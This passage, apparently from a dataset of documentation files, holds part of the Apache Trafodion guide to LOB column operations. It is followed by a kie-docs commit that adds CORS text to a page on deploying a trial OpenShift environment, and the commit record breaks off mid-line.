{lob_query-expr} \r\n\r\nlob_query-expr is:\r\nNULL | ? 
|\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression'[, APPEND]) |\r\nFILETOLOB('lob source file name'[, APPEND]) |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value[, APPEND]) |\r\nEXTERNALTOLOB('external lob source file name'[, APPEND])\r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\nFor more information, see Semantics in <<inserting into a sql table containing lob columns,Inserting into a SQL Table Containing LOB Columns>>.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* In the table tlob1where c1 is 3, updates (appends) the value of c2 to lob_update.txt.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to anoush.jpg.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('anoush.jpg');\r\n```\r\n\r\n* In the table tlob1 where c1 is 3, updates (appends) the value of c2 to lob_update.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('hdfs:\/\/\/lobs\/lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to the buffer location at 1254674 with 4000-byte length.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=buffertolob(LOCATION 12546474, SIZE 4000);\r\n```\r\n\r\n* In the table tlob130ext where c1 is 2, updates (overwrites) the value of c4 to lob_input_d1.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob130ext SET c4=externaltolob('hdfs:\/\/\/lobs\/lob_input_d1.txt') WHERE c1=2;\r\n```\r\n\r\n* In the table t130lob2 where c1 is 1, updates (overwrites) value of the c2 to xyxyxyxyxyxyx.\r\n+\r\n```\r\nPREPARE S FROM UPDATE t130lob2 SET c2=? WHERE c1 =1;\r\nEXECUTE S USING 'xyxyxyxyxyxyx';\r\n```\r\n\r\n[# updating using lob handle]\r\n=== Updating Using Lob Handle\r\n\r\nA LOB handle is specified to the update (similar to extract). \r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE LOB (LOB 'lob handle', lob update expression)\r\n```\r\n\r\n```\r\nlob update expression is: \r\nLOCATION lob source buffer address, LENGTH lob length value [, APPEND]) | \r\nEMPTY_BLOB() | \r\nEMPTY_CLOB()\r\n```\r\n\r\nFor more information about examples, see http:\/\/trafodion.incubator.apache.org\/docs\/jdbct4ref_guide\/index.html[*Trafodion JDBC Type 4 Programmer\u2019s Reference Guide*].\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* The keyword `APPEND` can be used to append to lob data that may already exist in a LOB column. If it is not specified, the data is overwritten.\r\n\r\n* When a LOB column is updated or overwritten, a new section is written into the LOB data file. The old section remains in HDFS but won\u2019t have any pointer or reference to it.\r\n\r\n* When a LOB column is appended, a new chunk is inserted into HDFS and a new row is added in the LOB Descriptor Chunks table to keep track of this new chunk, belonging to the existing row\/LOB data. 
\r\n\r\n+\r\nSo a LOB column that contains data that has been appended several times can contain multiple descriptor rows in the Descriptor Chunks table to describe where each chunk belonging to this LOB begins\/ends.\r\n\r\n* `APPEND` cannot be used on function `EXTERNALTOLOB`.\r\n\r\n* When an external LOB is updated outside of Trafodion, an update needs to be done to update the descriptor files in Trafodion. \r\n+\r\nFor example, if the external file changes in size, the descriptor file needs to be updated to reflect that. Since this is outside the control of Trafodion, the user needs to do this. If not, when extracting data, only partial data may be returned. \r\n\r\n* If a column is declared with the `STORAGE 'External'` attribute, the `STRINGTOLOB` or `FILETOLOB` functions cannot be used to insert data into that column. \r\n+\r\nSimilarly, if a column is declared without the `STORAGE 'External'` attribute, the `EXTERNALTOLOB` function cannot be used to insert\/update data into that column.\r\n+\r\nThat is, once the storage for a LOB column is declared at CREATE time, the attribute is set and cannot be modified. \r\n\r\n[#selecting column from a sql table containing lob columns]\r\n== Selecting Column from a SQL Table Containing LOB Columns\r\n\r\nSelecting a row from a table will give back the lob handle for the lob column. \r\n\r\nNOTE: The entry in each lob column in the SQL table only contains the LOB handle.\r\n\r\nOnce the LOB handle has been retrieved, it can be used to retrieve the actual lob data from HDFS.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSELECT lob_query-expr[, lob_query-expr] FROM table-name\r\n```\r\n\r\n```\r\nlob_query_expr is: \r\nlobtostring(lob column) |\r\nlob column\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example selects c2 from table tlob1 and returns the lob handle of c2.\r\n+\r\n```\r\nSELECT c2 FROM tlob1;\r\nC2\r\n----------------------------------------------------------------------------------------------------\r\n\r\nLOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\" \r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n[#extracting lob data from a sql table containing lob columns]\r\n== Extracting LOB Data from a SQL Table Containing LOB Columns \r\n\r\nExtract lob data can be done in two ways:\r\n\r\n* Extract lob data into a file for a given lob handle\r\n+\r\nExtract from a LOB column straight into an on-platform linux or HDFS file in one shot. \r\n\r\n+\r\nTrafodion engine will take care of buffering the data and retrieve the lob data into the target file.\r\n\r\n* Extract lob data into a user specified buffer\r\n+\r\nExtract from a LOB column into a target user buffer of a specified size. \r\n+\r\nTrafodion engine will retrieve exactly the amount of requested data. \r\n+\r\nThe user\/application will be responsible for redriving the extract until end of data. \r\n+\r\nThe extracted buffer data can then be written to files or another location as the application chooses. 
\r\n\r\n[#extracting lob data into a file for a given lob handle]\r\n=== Extracting Lob Data into a File for a Given Lob Handle\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOFILE (LOB 'lob handle as quoted string', 'filename URI format' [OPTION])\r\n```\r\n\r\n```\r\nOPTION is: \r\n[, TRUNCATE]\r\n[, CREATE, TRUNCATE]\r\n[, APPEND] \r\n[, CREATE, APPEND]\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it.\r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and write to it.\r\n\r\n* `APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and append to it. \r\n\r\n[#considerations]\r\n==== Considerations\r\n\r\nIf the target file exists, an `OPTION` must be specified; without one, an error will be raised by default.\r\n\r\nIf the target file does not exist, you can have Trafodion create it by specifying one of the `CREATE` options.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts a LOB to the file tlob130_txt1.txt:\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583625519884121437206093184618212317486018305654020\"TRAFODION\".\"LOB130\"', 'tlob130_txt1.txt');\r\nSuccess. Targetfile:tlob130_txt1.txt Length: 19\r\n```\r\n\r\n* This example extracts a LOB to the file tlob130_deep.jpg:\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583681719884121437210516812518212317486062586654020\"TRAFODION\".\"LOB130\"', 'tlob130_deep.jpg');\r\nSuccess. Targetfile:tlob130_deep.jpg Length: 159018\r\n```\r\n\r\n[#extracting lob data into a user specified buffer]\r\n=== Extracting Lob Data into a User Specified Buffer\r\n\r\nExtract from a LOB column into a target user buffer of a specified size. The Trafodion engine will retrieve exactly the amount of requested data. The user\/application will be responsible for redriving the extract until end of data. Then the extracted buffer data can be written to files or another location as the application chooses. \r\n\r\nExtract LOB data into a user-specified buffer like a cursor until EOD is returned. For this method, the user specifies an input buffer and specifies the input length in an in\/out variable. \r\n\r\nFor each execution of the extract, Trafodion will return SUCCESS, ERROR or EOD. \r\nFor the cases of SUCCESS or EOD, a length will also be returned to the user, so the user knows exactly how much data was actually extracted and returned. \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOBUFFER (LOB 'lob handle as quoted string', LOCATION lob output buffer address as long, SIZE input\/output address of length container as long)\r\n```\r\n\r\n[#extracting lob length for a given lob handle]\r\n=== Extracting Lob Length for a Given Lob Handle\r\n\r\nRetrieves the length of the LOB data for a given LOB handle, typically prior to extracting the data itself.
\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBLENGTH (LOB 'lob handle as quoted string'[, LOCATION address of length container for lob length])\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `_LOCATION address of length container for lob length_`\r\n+\r\nThis is used by programs\/applications that will use this syntax to retrieve the LOB length prior to extracting data. The address should be the address of a 64-bit container that will hold the LOB length. \r\n+\r\nIf the `LOCATION` address is omitted or 0, only a status message that displays the length is returned.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts a LOB length and returns 30.\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH0000000800030554121478481170502119554121478546064413218212330526373762019024\"TRAFODION\".\"TESTEXTLOB\"');\r\nLOB Length: 30\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example extracts a LOB length and returns 4.\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\"');\r\nLOB Length: 4\r\n--- SQL operation complete.\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* LOB Max Extract Data Length\r\n+\r\nCQD `LOB_OUTPUT_SIZE` (default 32000) controls the maximum data length that can be extracted.\r\n\r\n* LOB Max Extract Chunk Length\r\n+\r\nCQD `LOB_MAX_CHUNK_MEM_SIZE` (default 512 MB, expressed in bytes [536870912]) controls the maximum chunk of data that can be read from HDFS into memory and written to the target file location. \r\n\r\n* LOB Max Size\r\n+\r\nCQD `LOB_MAX_SIZE` (default 10G, expressed in MB [10000M]) controls the maximum size of a LOB.\r\n\r\n* Extract Target Locations\r\n+\r\nThe file to extract to can be a local linux file or a local HDFS file.\r\n\r\n[#deleting column from a sql table containing lob columns]\r\n== Deleting Column from a SQL Table Containing LOB Columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nDELETE lob-column-name FROM table-name [WHERE CLAUSE]\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen one or more rows containing LOB columns are deleted from a LOB table, only the metadata information is dropped and the HDFS data remains as it is. The references to the LOB data are removed from the LOB descriptor file. \r\n\r\nThis mechanism has not been implemented yet as a separate utility, but it is triggered as a part of insert, update and append operations. For more information, see <<garbage collection,Garbage Collection>>.\r\n\r\n[#dropping a sql table containing lob columns]\r\n== Dropping a SQL Table Containing LOB Columns \r\n\r\nDrop works like any other drop table. All dependent tables are deleted, and all HDFS files (data and descriptor) are also deleted.\r\n\r\nFor more information, see <<drop_table_statement,DROP TABLE Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#garbage collection]\r\n== Garbage Collection\r\n\r\nWhen a LOB datafile for a column has reached a certain limit, defined by the CQD `LOB_GC_LIMIT_SIZE`, a compaction is triggered automatically. +\r\nThe default GC limit is 10GB and can be changed if needed. \r\n\r\nThe need for GC arises because when a delete operation or an update operation is performed, the old data block in the HDFS file will be left as unused. +\r\n
In the case of update, the old data will be left as unused and the new data will be written into a new section, so all these \u201choles\u201d in the LOB data file are needlessly occupying space. \r\n\r\nThe LOB descriptor chunks file is examined to see which ranges and offsets are actually used. The LOB datafile is temporarily saved, and the compaction is done into a new tempfile. When the sections have all been copied into the tempfile, Trafodion will delete the existing LOB data file and rename the tempfile. \r\n\r\nFinally, the saved copy of the LOB datafile is dropped. The saved copy is kept so that you can fall back to it if an error occurs. Since this operation is triggered as part of an IUD operation, a definite slowdown will occur for that insert\/update operation compared to subsequent inserts\/updates. \r\n\r\nAlso, each LOB column of a table can be compacted separately as needed. GC does not have to be done to all columns of the LOB table all at once. \r\n\r\nNOTE: Currently the GC is done in the same transaction as the transaction being used for the insert or update operation. If any part of the GC fails, then the entire transaction is aborted. \r\n\r\nWhen Trafodion has support for local transactions, Trafodion will do the GC in a separate transaction or in a separate process, so the GC can fail with a warning and still allow the insert to go through. \r\n\r\nSetting the CQD `LOB_GC_LIMIT_SIZE` to 0 prevents GC from occurring.\r\n\r\n[#cleanup of a sql table containing lob columns]\r\n== Cleanup of a SQL Table Containing LOB Columns\r\n\r\nCleanup works like cleanup of any other table. The command ensures all dependent SQL LOB tables and HDFS files are dropped, ignoring any errors.\r\n\r\nFor more information, see <<cleanup_statement,CLEANUP Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#showddl for lob]\r\n== SHOWDDL for LOB\r\n\r\nSHOWDDL for LOB with a special option will show all the dependent objects, names and details about the table.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSHOWDDL table-name, LOB DETAILS\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example displays the details of the table tlob1.\r\n+\r\n```\r\n>>SHOWDDL tlob1, LOB DETAILS;\r\nCREATE TABLE TRAFODION.SEABASE.TLOB1\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SEABASE.LOBMD_04239091936503896833\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04239091936503896833_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescHandle_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n
LOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescChunks_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , INTPARAM LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example displays the details of the table tlob130ext.\r\n+\r\n```\r\n>>CREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', primary key (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SHOWDDL tlob130ext, LOB DETAILS;\r\n\r\nCREATE TABLE TRAFODION.SCH.TLOB130EXT\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , C3 CLOB DEFAULT NULL NOT SERIALIZED\r\n , C4 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SCH.LOBMD__04474425229029907479\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 2\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0002\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n
LOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 3\r\n\r\nData Storage\r\n============\r\n\r\n<External HDFS location>\r\n<External HDFS file>\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n[#get statement for lob tables]\r\n== Get Statement for LOB Tables\r\n\r\nThe GET statement for LOB tables gives column-specific information on any LOB columns in a table. \r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nGET LOB STATS FOR TABLE table-name;\r\nSELECT * FROM TABLE(LOB STATS table-name);\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\nSuppose the following tables have been created:\r\n\r\n```\r\n>>CREATE TABLE tlob130gt (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB, PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>CREATE TABLE tlob130gt2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This Get Statement displays statistics for the table tlob130gt; the LOB information is formatted for machine readability.\r\n+\r\n```\r\n
>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name) , 20), left(trim(column_name),5), left(trim(lob_location),5) , left(trim(lob_data_file),20),LOB_DATA_FILE_SIZE_EOD,LOB_DATA_FILE_SIZE_USED from table(lob stats(tlob130gt));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C4 \/user\/trafodion\/lobs LOBP_044744252290302 45 30\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n* This Get Statement displays statistics for the table tlob130gt2; the LOB information is formatted for human readability.\r\n+\r\n```\r\n>>GET LOB STATS FOR TABLE tlob130gt2;\r\n\r\nLob Information for table: \"TRAFODION\".LOB130.TLOB130GT2\r\n=========================\r\n\r\nColumnName: C2\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0001\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\nColumnName: C3\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0002\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\nColumnName: C4\r\nLob Location: External HDFS Location\r\nLOB Data File: External HDFS File\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This Get Statement displays statistics for the table tlob130gt2; the LOB information is formatted for machine readability.\r\n+\r\n```\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name), 20), left(trim(column_name),5), left(trim(lob_location),15), left(trim(lob_data_file),20),LOB_DATA_FILE_SIZE_EOD,LOB_DATA_FILE_SIZE_USED from table(lob stats(tlob130gt2));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290300 0 0\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290300 0 0\r\nTRAFODION.SCH.TLOB13 C4 External HDFS Location External HDFS File 0 0\r\n\r\n--- 3 row(s) selected.\r\n```","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b41fdc13e96d2b32da8883bb9313d5485151f7e3","subject":"CORS text (#24) (#1219)","message":"CORS text (#24) (#1219)\r\n\r\n* first draft CORS text\r\n\r\n* peer review","repos":"manstis\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs","old_file":"doc-content\/enterprise-only\/openshift\/environment-trial-proc.adoc","new_file":"doc-content\/enterprise-only\/openshift\/environment-trial-proc.adoc","new_contents":"[id='environment-trial-proc']\n= Deploying a trial environment\n\nYou can deploy a trial (evaluation) {PRODUCT} environment. It consists of {CENTRAL} for authoring or managing services and {KIE_SERVER} for test execution of services. \n\nThis environment does not include permanent storage. Assets that you create or modify in a trial environment are not saved. \n\nThis environment is intended for test and demonstration access. It supports cross-origin resource sharing (CORS). This means that {KIE_SERVER} endpoints can be accessed using a browser when other resources on the page are provided by other servers. {KIE_SERVER} endpoints are normally intended for REST calls, but browser access can be needed in some demonstration configurations.
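\n\nBrowser-based access works only if the server returns the expected CORS response headers. As a quick check, you can send a request with an `Origin` header and inspect the response. The following is an illustrative sketch only; the user name, route host, and origin are placeholders, not values defined by this template:\n\n----\ncurl -i -u adminUser:RedHat -H \"Origin: http:\/\/example.com\" \"http:\/\/<kie-server-route>\/services\/rest\/server\"\n----\n\nIf CORS is active, the response should include an `Access-Control-Allow-Origin` header.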
\n\nThe procedure is minimal. There are no required settings and all passwords are set to a single value (the default password is `RedHat`).\n\nTo deploy a single authoring environment, use the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` template file. You can extract this file from the `{PRODUCT_FILE}-openshift-templates.zip` product deliverable file. You can download the file from the {PRODUCT_DOWNLOAD_LINK}[Software Downloads] page.\n\n.Procedure\n\n. Use one of the following methods to deploy the template:\n* In the OpenShift Web UI, select *Add to Project -> Import YAML \/ JSON* and then select or paste the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` file. In the *Add Template* window, ensure *Process the template* is selected and click *Continue*.\n* To use the OpenShift command line console, prepare the following command line:\n+\n[subs=\"attributes,verbatim,macros\"]\n----\noc new-app -f <template-path>\/{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml \n----\n+\nIn this command line, replace `<template-path>` with the path to the downloaded template file.\n. Optionally, set any parameters as described in the template. However, a typical trial deployment does not require any parameters.\n. Complete the creation of the environment, depending on the method that you are using:\n* In the OpenShift Web UI, click *Create*.\n* Complete and run the command line.\n\n","old_contents":"[id='environment-trial-proc']\n= Deploying a trial environment\n\nYou can deploy a trial (evaluation) {PRODUCT} environment. It consists of {CENTRAL} for authoring or managing services and {KIE_SERVER} for test execution of services. \n\nThis environment does not include permanent storage. Assets that you create or modify in a trial environment are not saved. \n\nThe procedure is minimal. There are no required settings and all passwords are set to a single value (the default password is `RedHat`).\n\nTo deploy a single authoring environment, use the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` template file. You can extract this file from the `{PRODUCT_FILE}-openshift-templates.zip` product deliverable file. You can download the file from the {PRODUCT_DOWNLOAD_LINK}[Software Downloads] page.\n\n.Procedure\n\n. Use one of the following methods to deploy the template:\n* In the OpenShift Web UI, select *Add to Project -> Import YAML \/ JSON* and then select or paste the `{PRODUCT_INIT}{ENTERPRISE_VERSION_SHORT}-trial-ephemeral.yaml` file. In the *Add Template* window, ensure *Process the template* is selected and click *Continue*.\n* To use the OpenShift command line console, prepare the following command line:\n+\n[subs=\"attributes,verbatim,macros\"]\n----\noc new-app -f 